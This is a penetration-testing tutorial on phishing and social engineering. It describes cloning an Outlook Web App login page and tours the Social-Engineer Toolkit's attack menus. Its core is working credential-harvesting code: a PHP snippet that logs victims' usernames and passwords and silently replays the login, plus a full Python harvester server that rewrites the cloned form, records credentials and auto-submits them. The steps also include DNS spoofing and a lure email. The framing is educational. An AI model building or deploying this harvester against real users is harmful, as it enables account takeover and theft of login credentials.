Internet usage is growing dramatically, but the vast majority of internet users have no security background. Nor do most companies care about information security or appreciate the severity of an attack on their valuable assets, and they do not give their employees security awareness sessions either. For these reasons, humans are the weakest link in the information security chain.
On the other hand, most penetration testers focus only on client- and server-side exploits (how to gain a shell on a server by interacting with it directly). They do not focus on how to exploit the weakest link in the chain, the humans, even though a tester can obtain a shell simply by luring the victim into running it on his own machine through one of the social engineering techniques described below.
Let’s talk about the phishing and social engineering techniques a pen-tester can use to deceive victims and take control of their machines. The major technique here is “phishing.” According to Wikipedia, phishing is:
|Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.|
Social engineering definition according to Wikipedia:
|Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that the attack is often a mere step in a more complex fraud.|
Clone phishing is a type of phishing attack in which the attacker clones a website that his victim usually visits. The cloned site asks for login credentials, mimicking the real one, so that the attacker can save the credentials in a text file or database record on his own server and then forward the victim to the real website, where the victim ends up logged in as usual. The same idea applies to email: the attacker takes a legitimate, previously delivered email containing an attachment or link, copies its content and recipient addresses to create an almost identical (cloned) email, replaces the attachment or link with a malicious version, and sends it from an address spoofed to appear to come from the original sender.
Clone Phishing Demo
The scenario of this demo is as follows. The attacker resides on the same physical network as the victim, and the victim usually reads his mail through the Outlook Web App (OWA) server. The attacker therefore decides to attack the victim while he is accessing OWA. He begins with a Man-In-The-Middle (MITM) attack and sniffs all traffic passing between the victim and the gateway (see “Password Cracking Using Cain and Abel”), but the OWA traffic is encrypted, so he turns to clone phishing to capture the victim’s credentials instead.
According to this scenario, the attacker takes the following steps for a successful exploitation:
- Launch a webserver under the attacker’s control.
- Rebuild the directory hierarchy of the real OWA server on it.
- Clone the look and design of the OWA login page.
- Write the PHP code that saves the captured credentials to a text file and hands the victim over to the real server.
- Launch a DNS spoofing attack to redirect the victim to the fake OWA server, or simply send the victim an email containing the fake URL.
Step 1: Launch a webserver owned by the attacker.
The attacker must have a webserver under his control on the same network as the victim. The webserver vendor does not matter at all; there are plenty to choose from, such as Apache or IIS.
Steps 2 and 3: Build the same hierarchy and clone the design of the OWA server
There are many tools that automate these two steps, such as httrack or the ScrapBook Firefox extension. They mirror the OWA server’s directory hierarchy together with its view and design, including the HTML, JavaScript, CSS and images. After mirroring, the attacker edits the copied login page so that its form posts to his own PHP script (step 4) instead of to the real owaauth.dll.
Step 4: Write the PHP code that will save the credentials in a text file
The PHP code the attacker uses can be simple or complex depending on the scenario. For ours, a simple script suffices.
For explanation purposes, this code will be divided into three parts as follows:
The first part
<?php
// Part 1: append the remote IP and the submitted credentials to Credentials.txt
$FileHandle = fopen("Credentials.txt", "a") or die("can't open file");
$ip       = $_SERVER['REMOTE_ADDR'];
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
fwrite($FileHandle, "Remote IP : $ip || Username : $username || Password : $password \n");
fclose($FileHandle);
?>
This part retrieves the remote IP address, username and password from the incoming POST request, appends them to a file called Credentials.txt, and closes the file handle. The script uses the full <?php opening tag because the short <? form only works when short_open_tag is enabled in php.ini.
The second part
<form id="OWASubmit" action="https://owa.target.com/OWA/auth/owaauth.dll" method="POST">
<input type="hidden" name="destination" value="https://owa.target.com/OWA/" />
<input type="hidden" name="flags" value="0" />
<input type="hidden" name="forcedownlevel" value="0" />
<input type="hidden" name="trusted" value="0" />
<input type="hidden" name="username" value="<?php echo htmlspecialchars($username, ENT_QUOTES); ?>" />
<input type="hidden" name="password" value="<?php echo htmlspecialchars($password, ENT_QUOTES); ?>" />
<input type="hidden" name="isUtf8" value="1" />
</form>
The second part is an HTML form carrying all the POST parameters needed to log the victim into the real OWA server, so that the victim sees nothing suspicious. The captured values are passed through htmlspecialchars(), because a credential containing a quote would otherwise break the hidden input and the replayed login would fail with an error the victim would notice.
The third part
The third part is the JavaScript code that auto-submits the form above to the real OWA server as soon as the page loads, so the intermediate page is never on screen long enough for the victim to notice it.
Step 5: Send an email to convince the victim to access the fake OWA server
The attacker sends the fake OWA URL to the victim through any mail server. The email content must not look suspicious, since the victim has to be convinced to click the link and enter his credentials.
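The whole harvester described in steps 2 to 4, re-implemented as one self-contained Python script. This is an added example and not the article’s PHP code or any SET module: the real login URL and the hidden field names are taken from the article’s form, while the auto-submit script (the third part, which the article describes but does not show), the rewrite_form_action() helper that repoints the mirrored page’s form at the harvester, the /owaauth.php path and port 8080 are all my assumptions.

```python
# Clone-phishing credential harvester: Python re-implementation of the three-part
# PHP design above (log, replay form, auto-submit). Added example, not the
# article's code. REAL_LOGIN and the hidden fields come from the article's form;
# the auto-submit script, rewrite_form_action(), HARVESTER_PATH and port 8080
# are assumptions.
import html
import re
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

REAL_LOGIN = "https://owa.target.com/OWA/auth/owaauth.dll"   # from the article's form
DESTINATION = "https://owa.target.com/OWA/"
LOG_FILE = "Credentials.txt"
HARVESTER_PATH = "/owaauth.php"                              # assumed path on the fake server

# Hidden fields the real OWA login expects, as listed in the article's form.
OWA_FIXED_FIELDS = {
    "destination": DESTINATION, "flags": "0", "forcedownlevel": "0",
    "trusted": "0", "isUtf8": "1",
}

_FORM_ACTION = re.compile(r'(<form\b[^>]*?\baction=)(["\'])(.*?)\2', re.I | re.S)


def rewrite_form_action(cloned_html: str, harvester_path: str = HARVESTER_PATH) -> str:
    """Point every <form action="..."> in a mirrored page at the harvester.

    httrack copies the login page verbatim, so its form still posts to the real
    owaauth.dll; this is the edit the attacker makes after mirroring.
    """
    return _FORM_ACTION.sub(
        lambda m: m.group(1) + m.group(2) + harvester_path + m.group(2), cloned_html)


def format_log_line(remote_ip: str, username: str, password: str) -> str:
    """Part 1: same one-line layout as the article's fwrite() call."""
    return f"Remote IP : {remote_ip} || Username : {username} || Password : {password}\n"


def record_credentials(path: str, remote_ip: str, username: str, password: str) -> None:
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(format_log_line(remote_ip, username, password))


def build_replay_page(username: str, password: str) -> str:
    """Parts 2 and 3: hidden form for the real server plus an auto-submit script.

    html.escape(quote=True) plays the role of htmlspecialchars(): a credential
    containing a quote must not break the attribute, or the replayed login fails
    and the victim sees an error instead of his inbox.
    """
    fields = dict(OWA_FIXED_FIELDS, username=username, password=password)
    inputs = "\n".join(
        f'  <input type="hidden" name="{name}" value="{html.escape(value, quote=True)}" />'
        for name, value in fields.items())
    return (
        "<html><body>\n"
        f'<form id="OWASubmit" action="{REAL_LOGIN}" method="POST">\n{inputs}\n</form>\n'
        '<script>document.getElementById("OWASubmit").submit();</script>\n'
        "</body></html>\n")


class Harvester(BaseHTTPRequestHandler):
    """Handles the POST from the cloned login page. The static clone itself is
    served by the attacker's ordinary webserver (Apache/IIS in the article)."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        form = parse_qs(self.rfile.read(length).decode("utf-8", "replace"))
        username = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        record_credentials(LOG_FILE, self.client_address[0], username, password)
        body = build_replay_page(username, password).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), Harvester).serve_forever()
```

Run rewrite_form_action() once over the login page that httrack produced, serve the result from the webserver of step 1, and start this script on the same host so that the form’s POST reaches it. Note that the replayed login is submitted by the victim’s own browser, so the real OWA server sees the victim’s IP address, but depending on the browser’s referrer policy the POST may carry a Referer header naming the fake host; that header is something a defender can hunt for in the OWA server’s logs.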
Social Engineer Toolkit
The Social-Engineer Toolkit (SET) was created and written by David Kennedy (ReL1K). SET is an open-source, Python-driven tool that focuses solely on attacking the weakest link in the information security chain, the human element. The attacks built into the toolkit are designed as targeted, focused attacks against a person or organization during a penetration test.
The Social-Engineer Toolkit (SET) is included in the latest version of the most popular security-focused Linux distribution, BackTrack. It can also be downloaded from GitHub with the following command:
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
Social Engineer Toolkit Menu
The Social-Engineer Toolkit (SET) is a menu-driven attack system rather than a command-line tool. This decision was made because of how social engineering attacks occur: they require multiple scenarios, options and customizations, and a purely command-line interface would limit the effectiveness of the attacks. Now it is time to step through the SET menu and take a brief walkthrough of most of its attack vectors.
- Social-Engineering Attacks
- Fast-Track Penetration Testing
- Third Party Modules
- Update the Metasploit Framework
- Update the Social-Engineer Toolkit
- Update SET configuration
- Help, Credits, and About
The most important item in this menu is Social-Engineering Attacks, which contains all the attack vectors. The remaining items are self-explanatory: the Fast-Track penetration testing framework, third-party modules, updating the Metasploit Framework, updating SET itself, and updating the SET configuration.
Social Engineer Toolkit Usage
To open the Social-Engineer Toolkit (SET) in the BackTrack distribution, go to Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit -> SET.
SET opens in the terminal and looks like the following screenshot (assuming you have installed the latest version of SET).
Now let’s select Social-Engineering Attacks from the menu. Once chosen, it shows a submenu listing the available attack types:
- Spear-Phishing Attack Vectors
- Website Attack Vectors
- Infectious Media Generator
- Create a Payload and Listener
- Mass Mailer Attack
- Arduino-Based Attack Vector
- SMS Spoofing Attack Vector
- Wireless Access Point Attack Vector
- QRCode Generator Attack Vector
- Powershell Attack Vectors
- Third Party Modules
Now let’s select Website Attack Vectors from that menu. Once chosen, it shows a further submenu of attack methods:
- Java Applet Attack Method
- Metasploit Browser Exploit Method
- Credential Harvester Attack Method
- Tabnabbing Attack Method
- Man Left in the Middle Attack Method
- Web Jacking Attack Method
- Multi-Attack Web Method
- Victim Web Profiler
- Create or import a CodeSigning Certificate
SET prints a short explanation of each attack method, which helps you choose the one that suits the attacker’s scenario. Here is the explanation:
Remember that most Internet users have no security background, and the vast majority of companies do not care about information security: they do not realize the severity of an attack on their valuable assets, nor do they give their employees security awareness sessions. For these reasons, social engineering is a very important stage of the penetration testing methodology, one that most pen-testers neglect despite its value.